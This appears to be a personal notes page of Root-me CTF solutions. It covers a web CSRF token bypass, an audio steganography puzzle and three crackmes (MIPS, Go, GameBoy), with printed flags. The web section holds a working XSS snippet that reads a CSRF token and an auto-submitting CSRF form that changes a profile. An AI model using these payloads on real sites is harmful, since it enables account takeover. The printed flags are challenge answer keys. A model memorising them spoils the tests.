CTF
Search…
Root-me.org
I decided to start getting habit of taking note after this tragedy happens (Thanks @reznok!!!!)
Again, this is a note so that incase root-me be fucked up again, i can easily got all my flag and solution back, THIS IS NOT A WRITE UP.
sad.png

Web - Client

CSRF - token bypass

First, we must steal the token by using XSS
steal_token.js
1
<iframe id="iframe" src="/web-client/ch23/?action=profile" onload="read()"></iframe>
2
<script>
3
function read()
4
{
5
document.location = document.getElementById("iframe").contentDocument.forms[0].token.value;
6
}
7
</script>
Copied!
Second, we create crsf form that get token and submit request
1
<html>
2
<!-- CSRF PoC - generated by Burp Suite Professional -->
3
<body>
4
<script>
5
function get(name){
6
if(name=(new RegExp('[?&]'+encodeURIComponent(name)+'=([^&]*)')).exec(location.search))
7
document.getElementById("token").value = decodeURIComponent(name[1]);
8
}
9
</script>
10
11
<form id="csrf" action="http://challenge01.root-me.org/web-client/ch23/?action=profile" method="POST" enctype="multipart/form-data">
12
<input type="hidden" name="username" value="tuanlinh1" />
13
<input type="hidden" name="status" value="on" />
14
<input id="token" name="token" value="" />
15
<input type="submit" value="Submit request" />
16
<script>get('token')</script>
17
<script>document.getElementById("csrf").submit()</script>
18
</form>
19
20
</body>
21
</html>
22
Copied!
pow

Steganography

Some Noise

Reverse it + Slow it down using Audacity
out_flag.mp3
176KB
Binary
flag
1
3b27641fc5h0
Copied!

Reverse Engineering

ELF MIPS - BASIC CRACKME

This challenge is quite easy but seems like people hate MIPS, so there are not much solves. It's actually the easiest assembly to read/write so far as i knew and tried.
First, program read input from stdin through fgets(), and check to see if input string length is equal 19 or not
If len(input_string) != 19, then it will lead to bad boy, otherwise, it keep running program
Next part is an for loop, where it check to see if ($fp + -0x58 + 4 + i) == 'i' where i from range(8, 17)
Which mean
1
>>> hex(-0x58+4+8)
2
'-0x4c'
3
>>> hex(-0x58+4+9)
4
'-0x4b'
5
>>> hex(-0x58+4+10)
6
'-0x4a'
7
>>> hex(-0x58+4+11)
8
'-0x49'
9
>>> hex(-0x58+4+12)
10
'-0x48'
11
>>> hex(-0x58+4+13)
12
'-0x47'
13
>>> hex(-0x58+4+14)
14
'-0x46'
15
>>> hex(-0x58+4+15)
16
'-0x45'
17
>>> hex(-0x58+4+16)
18
'-0x44'
19
>>> hex(-0x58+4+17)
20
'-0x43'
Copied!
Those memory offset will hold value that equal to "i"
Next is an if statement that check whether an fixed address hold an char it want
Which mean
1
var_4F = var_50 + 3 = "u"
2
var_50 = "r"
3
var_51 = "t"
4
var_53 = "a"
5
var_54 = "c"
6
var_4E = "n"
7
var_52 = "n"
8
var_4D = "m"
9
var_43 = "p"
10
var_42 = "s"
Copied!
Now we can build an string from array from -0x54 to -0x42, which is also flag:
1
cantrunmiiiiiiiiips
Copied!

ELF x64 - Golang basic

Config IDA :
Thanks god this is not stripped binary :
Find main_main() :
First, that's why loop where it xor your input_string with "rootme" than compares with an hardcoded byte array
Debug to find which byte array it compares with :
solver.py
1
ida_chars =[
2
0x3B, 0x02, 0x23, 0x1B, 0x1B, 0x0C, 0x1C, 0x08, 0x28, 0x1B,
3
0x21, 0x04, 0x1C, 0x0B
4
]
5
key = 'rootme'
6
out = ""
7
for i in range(0, len(ida_chars)):
8
out += chr(ord(key[i%len(key)]) ^ (ida_chars[i]))
9
print out
10
print len(out)
Copied!
flag
1
ImLovingGoLand
Copied!

GB - Basic GameBoy Crackme

First thing first
This file is GameBoy ROM file, and there is some interesting strings
For debugging GameBoy ROM, i chose BGB (http://bgb.bircd.org/)
Basically, this is the game where you can move : RIGHT, LEFT, UP, DOWN. And hit enter to check, if you satisfy some requirements, it will print flag.
Let's load it into IDA (IDA > CPU = Zilog Z80 > Press C to force disassemble) :
Since i dont know where to start, so i start with string, trying to find its xref
1
0x042d = Right
2
0x0434 = Left
3
0x043E = Down
4
0x0444 = Yeah!
5
0x044C = Flag is
6
0x0459 = Nope
Copied!
From 44C, we can find good_boy
From good_boy, trace back, we realize there is 4 check_point :
So it take a value at memory [0x0C0B0] and compare with 0x32 , if equal then jump to next good_boy
Trace from 0x0C0B0, we found :
So, we already know that 0x42D is "RIGHT". Basically these asm lines just print "RIGHT", decrease value at [0x0C0B0] by 1 and do something with value at [0x0C0B4] which i believe is FLAG (looks up at good_boy)
Doing the samething with others check point, we know that, when you press a key :
1
RIGHT => [0x0C0B0h] - 1
2
LEFT => [0x0C0B1h] - 1
3
UP => [0x0C0B2h] - 1
4
DOWN => [0x0C0B3h] - 1
5
6
and then it do something with value at [0x0C0B4] (flag)
Copied!
Then it check to see if we satisfy all below constraints then print flag
1
[0x0C0B0h] == 0x32
2
[0x0C0B1h] == 0x30
3
[0x0C0B2h] == 0x37
4
[0x0C0B3h] == 0x38
Copied!
Now we need to know what's its initial value, time to use bgb to debug :
So initial value is :
1
[0x0C0B0h] == 0x39
2
[0x0C0B1h] == 0x39
3
[0x0C0B2h] == 0x39
4
[0x0C0B3h] == 0x39
Copied!
Time to get flag :
flag
1
rom1
Copied!
Last modified 2yr ago